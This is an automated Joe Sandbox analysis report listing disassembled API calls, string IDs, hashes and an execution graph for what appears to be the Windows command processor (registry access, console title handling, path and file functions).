                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 49548326-4093888634
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0003CD40,0000001C,00036901), ref: 000356A8
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
  • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00035778
  • Part of subcall function 000364DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 0003650F
  • Part of subcall function 000364DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00), ref: 00036545
  • Part of subcall function 000364DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036553
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: wcschr$Close$CreateOpenValueiswspace
• String ID: Software\Classes
• API String ID: 1047774138-1656466771
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0003CCE0,0000001C,00036931), ref: 00035E32
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
  • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
  • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00035EFB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: wcschr$CloseOpeniswspace
• String ID: Software\Classes
• API String ID: 2439148603-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c657350aabaed548d857256f1f098304ebf2ebda94bf2942347dd2b140246199
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 768faba384d78c8b081a76087421c95d28c5f78faa8fa2a9f486475685cd9b19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c657350aabaed548d857256f1f098304ebf2ebda94bf2942347dd2b140246199
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B316471F147148FDB19EFB8DC526EE76B9AF48711F10402EE006B72A2EA755E408B64
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0001B11F), ref: 0002CB8B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0002CC2D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b604cf8adf8b1936193eecabce9ce43f1a8825e4b4c7a2cab6a2eca8b18b24a2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e1c4fe520081e4ef5cf4c459a171d89ec226068fba58ae8df95cb08be15473e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b604cf8adf8b1936193eecabce9ce43f1a8825e4b4c7a2cab6a2eca8b18b24a2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 262149757005109BDB25A72CE895BFE77E2DBC6310F18402DE8074B745EA799D828682
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00038AC9
                                                                                                                                                                                                                                                                                                                                                                                                                          • printf.MSVCRT ref: 00038B24
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %3d
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f5da3e2c21ab49dd6500548c9adae149e6c492eeef13b9d0ec91df454c05f09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 46c0d3fdbe2900a71c837bcfd16c11f0a188a2aa4325bca8eb929af04ac24faf
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5da3e2c21ab49dd6500548c9adae149e6c492eeef13b9d0ec91df454c05f09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6012DB1610304BBFB226A559C47FDB3AADDB85BA0F444015FB09A5082D6B69D90C772
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 287713880-1539845467
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9dbbe7606ade0d32ac816c45886dd63bdc70acc3206dd22799adddd7f403fe74
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 172538ef2c260531c63e7ecf5cafb741931611aaa3c74c048b560dcb0584f36b
• Opcode Fuzzy Hash: 9dbbe7606ade0d32ac816c45886dd63bdc70acc3206dd22799adddd7f403fe74
• Instruction Fuzzy Hash: CDE0DF3370E2A2AA5770024DBC988FBA2DB8F93B6131A001BF800E3152E7684CC080A3

Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 10
API calls 20752->20753 20754 3a110 20753->20754 20755 3a114 wcschr 20754->20755 20756 3a129 20754->20756 20755->20752 20755->20756 20757 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20756->20757 20758 3a133 20757->20758 20758->20383 20760 1ee52 20759->20760 20761 1ee4c 20759->20761 20762 1ee5a wcsrchr 20760->20762 20765 1ee68 20760->20765 20761->20760 20763 1eea7 20761->20763 20762->20765 20766 21a05 5 API calls 20763->20766 20769 2de31 20763->20769 20764 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20768 1ee88 20764->20768 20765->20764 20798 1eed8 20766->20798 20767 2df50 longjmp 20767->20769 20768->20707 20769->20765 20769->20767 20770 2de49 ??_V@YAXPAX 20769->20770 20781 2decb 20769->20781 20770->20765 20771 1ef09 towlower wcsrchr 20774 1f1dd wcsrchr 20771->20774 20771->20798 20772 1ef50 wcsrchr 20775 1ef67 wcsrchr 20772->20775 20772->20798 20773 2de80 wcschr 20776 2df01 20773->20776 20777 2de9e 20773->20777 20778 1f1f7 towlower 20774->20778 20774->20798 20775->20776 20775->20798 20776->20770 20780 178e4 451 API calls 20776->20780 20779 1dcd0 451 API calls 20777->20779 20778->20798 20784 2deb5 20779->20784 20780->20769 20781->20770 20782 1acb0 451 API calls 20782->20798 20783 1efed 20783->20765 20785 1efef ??_V@YAXPAX 20783->20785 20784->20769 20833 21d90 20784->20833 20785->20765 20787 1efe6 20790 1acb0 451 API calls 20787->20790 20788 1f009 GetFullPathNameW 20788->20798 20790->20783 20791 1dc60 2 API calls 20791->20776 20792 2df72 SearchPathW 20792->20798 20793 20207 10 API calls 20794 1f03d wcsrchr 20793->20794 20795 2dfb9 wcsrchr 20794->20795 20794->20798 20795->20798 20796 1f067 memset 20797 1e3f0 17 API calls 20796->20797 20797->20798 20798->20769 20798->20770 20798->20771 20798->20772 20798->20773 20798->20776 20798->20782 20798->20783 20798->20787 20798->20788 20798->20792 20798->20793 20798->20795 20798->20796 20799 2dff6 GetFileAttributesExW 20798->20799 20800 1f18a 20798->20800 20801 
2e07c FileTimeToSystemTime 20798->20801 20806 16854 451 API calls 20798->20806 20808 1f164 wcsrchr 20798->20808 20809 19310 451 API calls 20798->20809 20846 3b325 20798->20846 20799->20798 20802 1acb0 451 API calls 20800->20802 20805 2e271 20800->20805 20801->20798 20803 1f1ba 20802->20803 20803->20783 20804 1f1c8 ??_V@YAXPAX 20803->20804 20804->20783 20806->20798 20808->20798 20808->20805 20809->20798 20811 1dcd0 451 API calls 20810->20811 20814 1bfc8 20811->20814 20812 2cfad longjmp 20820 1c02c 20812->20820 20813 2cfc1 longjmp 20813->20820 20815 1dcd0 451 API calls 20814->20815 20814->20820 20830 1c155 20814->20830 20815->20820 20816 1ec2e 451 API calls 20816->20820 20819 1c1ef wcstol 20819->20820 20820->20812 20820->20813 20820->20816 20820->20819 20821 1c111 20820->20821 20829 1c26d 20820->20829 20820->20830 20832 1c0bf 20820->20832 20824 2d029 20821->20824 20821->20830 20822 2d042 memcpy 20826 2d063 20822->20826 20823 1c333 memcpy 20827 1c1b2 _wcsnicmp 20823->20827 20825 178e4 451 API calls 20824->20825 20828 2d036 longjmp 20825->20828 20827->20830 20828->20822 20829->20830 20831 1c27d wcstol 20829->20831 20830->20822 20830->20823 20830->20827 20830->20832 20831->20830 20859 1c3f4 20832->20859 20834 21e5a 20833->20834 20835 21da8 20833->20835 20834->20791 20835->20834 20854 1ab7f 20835->20854 20838 1acb0 451 API calls 20839 21dc2 20838->20839 20840 201f5 wcsrchr 20839->20840 20845 21dd1 20840->20845 20841 2f106 20842 21e4a 20843 1dc60 2 API calls 20842->20843 20843->20834 20844 21e11 _wcsnicmp 20844->20845 20845->20841 20845->20842 20845->20844 20845->20845 20849 3b35b __aulldvrm 20846->20849 20847 3b42e 20848 3b445 wcsncmp 20847->20848 20851 3b432 20847->20851 20848->20851 20849->20847 20850 3b3f4 memmove 20849->20850 20850->20849 20852 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20851->20852 20853 3b4f8 20852->20853 20853->20798 20855 1abaa 20854->20855 20858 1ab88 20854->20858 20855->20838 20856 1ab89 iswspace 20857 1ab98 
wcschr 20856->20857 20856->20858 20857->20855 20857->20858 20858->20855 20858->20856 20858->20857 20860 1dc60 2 API calls 20859->20860 20861 1c3fb 20860->20861 20862 1dc60 2 API calls 20861->20862 20863 1c0df 20862->20863 20863->20707 20865 37660 20864->20865 20867 37679 20864->20867 20866 26e25 4 API calls 20865->20866 20866->20867 20867->20716 20867->20728 20867->20741 20868->20741 20870 38727 20869->20870 20875 38781 20869->20875 20871 1998d 451 API calls 20870->20871 20873 38736 20871->20873 20872 19950 451 API calls 20872->20873 20873->20872 20874 1998d 451 API calls 20873->20874 20873->20875 20874->20873 20877 19950 451 API calls 20876->20877 20878 386f9 20877->20878 20879 3871d 451 API calls 20878->20879 20880 38702 20879->20880 20881 38791 451 API calls 20880->20881 20882 3870d 20881->20882 20883 38791 451 API calls 20882->20883 20884 38718 20883->20884 20884->20295 20886 1adc6 20885->20886 20892 2cc3f 20885->20892 20887 25a2e memset 20886->20887 20889 1add1 20887->20889 20888 2cc6a GetLastError 20888->20892 20891 1e3f0 17 API calls 20889->20891 20889->20892 20890 178e4 451 API calls 20890->20892 20893 1adef 20891->20893 20892->20888 20892->20890 20894 261e6 ??_V@YAXPAX 20892->20894 20893->20892 20895 1ae05 20893->20895 20896 1b0b9 20893->20896 20894->20892 21152 1e950 memset 20895->21152 20898 20b12 5 API calls 20896->20898 20900 1b0c1 20898->20900 20900->20892 21134 17f47 memset 20900->21134 20901 1ae23 20901->20892 20905 2cc7c 20901->20905 20912 1ae44 20901->20912 20902 1b118 21148 221ee 20902->21148 20910 261e6 ??_V@YAXPAX 20905->20910 20907 1b11f 21276 22940 20907->21276 20908 1aea1 20908->20892 20925 1af6b 20908->20925 20930 20b12 5 API calls 20908->20930 20931 1aecb wcschr 20908->20931 20934 1b176 20908->20934 20945 17f47 23 API calls 20908->20945 20954 2ccc9 GetLastError 20908->20954 20909 1b0dc towupper 20911 1b100 20909->20911 20910->20908 20911->20902 20911->20911 20915 2cc75 20911->20915 20912->20908 20914 1bc30 451 API calls 20912->20914 20917 
1ae86 20914->20917 20918 39a7d 451 API calls 20915->20918 20916 1afc9 21204 1b17b 20916->21204 20921 1b00e wcsncmp 20917->20921 20923 1ae91 20917->20923 20918->20905 20921->20908 20921->20923 20922 261e6 ??_V@YAXPAX 20927 1afe8 20922->20927 20923->20908 20924 1a800 452 API calls 20923->20924 20924->20908 21179 1b1b0 20925->21179 20929 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20927->20929 20933 1b002 20929->20933 20930->20908 20931->20908 20950 1b033 20931->20950 20932 1af83 20936 1afc4 20932->20936 20937 1af99 20932->20937 20933->18654 20944 178e4 451 API calls 20934->20944 21198 1aa50 20936->21198 20938 1afa5 20937->20938 20939 1b02c 20937->20939 20941 1afb1 20938->20941 20942 1b085 20938->20942 21208 1c6c0 20939->21208 20947 1b0a2 20941->20947 20948 1afbd 20941->20948 21261 19dc0 20942->21261 20949 2cce0 20944->20949 20945->20908 20947->20907 20952 1afc2 20947->20952 21195 19770 20948->21195 20949->20892 20950->20942 20951 1b193 20950->20951 20955 26c78 4 API calls 20951->20955 20952->20916 20954->20934 20955->20934 20957 1e683 20956->20957 20958 1e6c6 20956->20958 20957->20958 20959 1e689 20957->20959 20962 1e71d 20957->20962 20963 1e6ec 20957->20963 20968 1e733 20957->20968 20958->18623 22058 1e790 20959->22058 20967 1e790 460 API calls 20962->20967 20963->20958 20966 1e790 460 API calls 20963->20966 20964 1e790 460 API calls 20969 1e6ad 20964->20969 20965 1e790 460 API calls 20965->20958 20966->20963 20967->20968 20968->20958 20968->20965 20969->20958 20970 1e790 460 API calls 20969->20970 20970->20969 20973 203cb 20971->20973 20972 203e1 20974 203f3 20972->20974 20975 20416 20972->20975 20973->20972 20976 2e7bf iswdigit 20973->20976 22072 215f0 20974->22072 20981 203f8 20975->20981 22076 22960 wcstol wcstol 20975->22076 20976->20973 20977 2e7e2 20976->20977 20980 178e4 451 API calls 20977->20980 20982 2040d 20980->20982 20983 1e470 908 API calls 20981->20983 20982->18654 20983->20982 20985 1e470 909 API calls 20984->20985 
20986 1ab63 20985->20986 20987 1ab76 20986->20987 20988 1e470 909 API calls 20986->20988 20987->18654 20988->20987 20990 1e3f0 17 API calls 20989->20990 21002 19f61 20990->21002 20991 1a0e7 ??_V@YAXPAX 20992 1a0ef 20991->20992 20993 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20992->20993 20995 1a0fe 20993->20995 20994 19fd7 20996 1dcd0 451 API calls 20994->20996 21020 19ff4 20994->21020 20995->18629 20995->18641 20996->21020 20997 20060 5 API calls 20997->21002 20999 1a0d9 20999->20991 20999->20992 21000 2c376 _get_osfhandle SetFilePointer 21003 2c392 21000->21003 21000->21020 21001 1a02b _get_osfhandle 21005 1a03d _get_osfhandle 21001->21005 21001->21020 21002->20994 21002->20997 21002->20999 21006 19abf _vsnwprintf 21003->21006 21005->21020 21007 2c3a9 21006->21007 21012 178e4 451 API calls 21007->21012 21008 2c439 21009 19abf _vsnwprintf 21008->21009 21009->21007 21010 1dd98 6 API calls 21010->21020 21011 1a16c _close 21011->21020 21013 2c463 21012->21013 21014 1a125 2 API calls 21013->21014 21014->20999 21015 1a1d6 _dup2 21015->21020 21016 2c3d3 21017 21d90 454 API calls 21016->21017 21021 2c3dd 21017->21021 21018 2c40c 21023 1a1d6 _dup2 21018->21023 21019 20590 19 API calls 21019->21020 21020->20999 21020->21000 21020->21001 21020->21008 21020->21010 21020->21011 21020->21015 21020->21016 21020->21018 21020->21019 21022 2c4aa 21020->21022 21024 1a11c 21020->21024 22081 1a1a8 _dup 21020->22081 22083 39fcf _get_osfhandle GetFileType 21020->22083 21021->21022 21027 2c3f2 SearchPathW 21021->21027 21025 1a125 2 API calls 21022->21025 21026 2c42d 21023->21026 21029 1a125 2 API calls 21024->21029 21028 2c4af 21025->21028 21030 2c434 21026->21030 21031 2c475 21026->21031 21027->21018 21027->21022 21032 39edb 451 API calls 21028->21032 21034 2c47f 21029->21034 21035 1a16c _close 21030->21035 21033 1a16c _close 21031->21033 21032->20999 21033->21024 21036 19abf _vsnwprintf 21034->21036 21035->21008 21037 2c496 21036->21037 21038 178e4 
451 API calls 21037->21038 21038->20999 21040 1e470 909 API calls 21039->21040 21041 203a2 21040->21041 21041->18654 21043 1dcd0 451 API calls 21042->21043 21044 20776 21043->21044 21045 2e9b9 21044->21045 21046 20792 21044->21046 21047 2089d 21044->21047 21051 1dd20 451 API calls 21046->21051 21048 1dcd0 451 API calls 21047->21048 21049 208a5 21048->21049 21050 1dcd0 451 API calls 21049->21050 21057 207de 21050->21057 21052 207b3 21051->21052 21053 207bb 21052->21053 21054 2e8bd 21052->21054 21056 1dd20 451 API calls 21053->21056 21055 1dc60 2 API calls 21054->21055 21058 207d6 21055->21058 21056->21058 21057->21045 21059 20812 21057->21059 21060 208c5 21057->21060 21058->21057 21063 1dc60 2 API calls 21058->21063 21061 20875 21059->21061 21062 20818 21059->21062 21064 1bc30 451 API calls 21060->21064 21065 2087f 21061->21065 21066 2e8e7 21061->21066 22084 20bf0 21062->22084 21063->21057 21068 208d2 wcstol 21064->21068 21069 1bc30 451 API calls 21065->21069 21072 20060 5 API calls 21066->21072 22199 1a7d5 21068->22199 21071 2088c 21069->21071 22148 16e57 21071->22148 21076 2e8fd GetFullPathNameW 21072->21076 21073 208ec wcstol 21074 1a7d5 21073->21074 21077 20906 wcstol 21074->21077 21079 2e915 21076->21079 21086 20922 21077->21086 21078 20822 21078->21045 21081 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21078->21081 21080 1dcd0 451 API calls 21079->21080 21082 178e4 451 API calls 21079->21082 21084 2e942 GetFullPathNameW 21079->21084 21088 2e95d 21079->21088 21080->21079 21083 20871 21081->21083 21082->21079 21083->18654 21084->21079 21085 398b5 456 API calls 21085->21086 21086->21066 21086->21085 21087 19abf _vsnwprintf 21086->21087 21093 2198f 3 API calls 21086->21093 22201 20bbb 21086->22201 21087->21086 21089 1bc30 451 API calls 21088->21089 21090 2e99d 21089->21090 22210 33e66 21090->22210 21093->21086 21095 1e5d8 21094->21095 21097 1eda4 21094->21097 21095->18645 21095->18657 21096 1edb7 _wcsicmp 21096->21095 21096->21097 
21097->21095 21097->21096 21099 22090 21098->21099 21100 1dcd0 451 API calls 21099->21100 21101 220a9 21100->21101 21102 1b1b0 451 API calls 21101->21102 21127 1e613 21101->21127 21103 220ba 21102->21103 21104 1f410 467 API calls 21103->21104 21103->21127 21105 220d2 21104->21105 21106 220d9 GetConsoleTitleW 21105->21106 21107 2212f 21105->21107 21110 1ad26 453 API calls 21106->21110 21108 22134 GetConsoleTitleW 21107->21108 21109 2217a 21107->21109 21111 1ad26 453 API calls 21108->21111 21112 22183 21109->21112 21113 2f23f 21109->21113 21114 220f2 21110->21114 21117 2214d 21111->21117 21118 2219f 21112->21118 21119 2f24d 21112->21119 21112->21127 21116 18bc7 451 API calls 21113->21116 22264 19458 21114->22264 21116->21127 21121 21a47 907 API calls 21117->21121 21122 178e4 451 API calls 21118->21122 21124 178e4 451 API calls 21119->21124 21120 22107 22326 221b5 21120->22326 21125 22164 21121->21125 21122->21127 21124->21127 22329 221c1 21125->22329 21127->18654 21129 25807 21128->21129 21130 25833 21128->21130 21131 25813 _setjmp3 21129->21131 21130->18652 21131->21130 21132 25825 21131->21132 22430 256c4 21132->22430 21135 1e3f0 17 API calls 21134->21135 21136 17fa0 21135->21136 21137 18001 21136->21137 21138 17fa4 GetDriveTypeW 21136->21138 21139 1800b ??_V@YAXPAX 21137->21139 21140 18013 21137->21140 21141 17fcf 21138->21141 21147 2b033 21138->21147 21139->21140 21143 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21140->21143 21141->21137 21145 17fe0 GetVolumeInformationW 21141->21145 21142 2b05a ??_V@YAXPAX 21142->21140 21144 18022 21143->21144 21144->20888 21144->20909 21145->21137 21146 2b040 GetLastError 21145->21146 21146->21137 21146->21147 21147->21140 21147->21142 21150 22200 21148->21150 21149 22229 21149->20907 21150->21149 21150->21150 21151 22081 909 API calls 21150->21151 21151->21149 21153 1e9b2 21152->21153 21160 1ea65 21152->21160 21154 1e3f0 17 API calls 21153->21154 21161 1e9c3 21154->21161 21155 1eb41 21163 1eb7e 
iswspace 21155->21163 21164 2dd3f 21155->21164 21166 1a62f wcschr 21155->21166 21167 1eac3 21155->21167 21156 1ea3d 21159 1ebf0 GetFileAttributesW 21156->21159 21156->21160 21157 1e9f6 wcschr 21157->21156 21157->21161 21158 1ea0e wcschr 21158->21161 21159->21160 21162 1ea7e _wcsicmp 21160->21162 21170 1ea99 21160->21170 21161->21155 21161->21156 21161->21157 21161->21158 21161->21160 21162->21160 21163->21155 21163->21167 21173 1dcd0 451 API calls 21164->21173 21165 1eaf7 21168 1eb05 ??_V@YAXPAX 21165->21168 21169 1eb0f 21165->21169 21166->21155 21167->21164 21167->21165 21168->21169 21171 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21169->21171 21170->21164 21170->21167 21172 1ed90 _wcsicmp 21170->21172 21174 1ae12 21171->21174 21172->21155 21175 2dd80 21173->21175 21174->20901 21174->20902 21176 39922 451 API calls 21175->21176 21178 2dd9e 21175->21178 21177 2dd91 longjmp 21176->21177 21177->21178 21180 1b1c9 21179->21180 21181 1dcd0 451 API calls 21180->21181 21182 1af78 21181->21182 21182->20932 21183 1ad26 21182->21183 21184 1ad37 21183->21184 21192 1ad40 21183->21192 21185 1dcd0 451 API calls 21184->21185 21184->21192 21186 2cb7b 21185->21186 21187 2cb85 GetConsoleTitleW 21186->21187 21186->21192 21188 2cb9b 21187->21188 21187->21192 21189 1dd20 451 API calls 21188->21189 21194 2cbcd 21189->21194 21190 2cc33 21191 1dc60 2 API calls 21190->21191 21191->21192 21192->20932 21193 2cc2c SetConsoleTitleW 21193->21190 21194->21190 21194->21193 21194->21194 21279 19cc0 21195->21279 21199 1aa66 21198->21199 21200 2c9eb 21198->21200 21486 1aa75 21199->21486 21202 1aa75 492 API calls 21200->21202 21203 1aa6b 21202->21203 21203->20916 21203->21203 21205 1afdd 21204->21205 21206 1b185 21204->21206 21205->20922 21206->21205 21207 2ccfa SetConsoleTitleW 21206->21207 21207->21205 21209 1c709 21208->21209 21210 1c7ae 21208->21210 21209->21210 21666 1b3c1 21209->21666 21211 21cb1 453 API calls 21210->21211 21214 398b5 456 API calls 21210->21214 
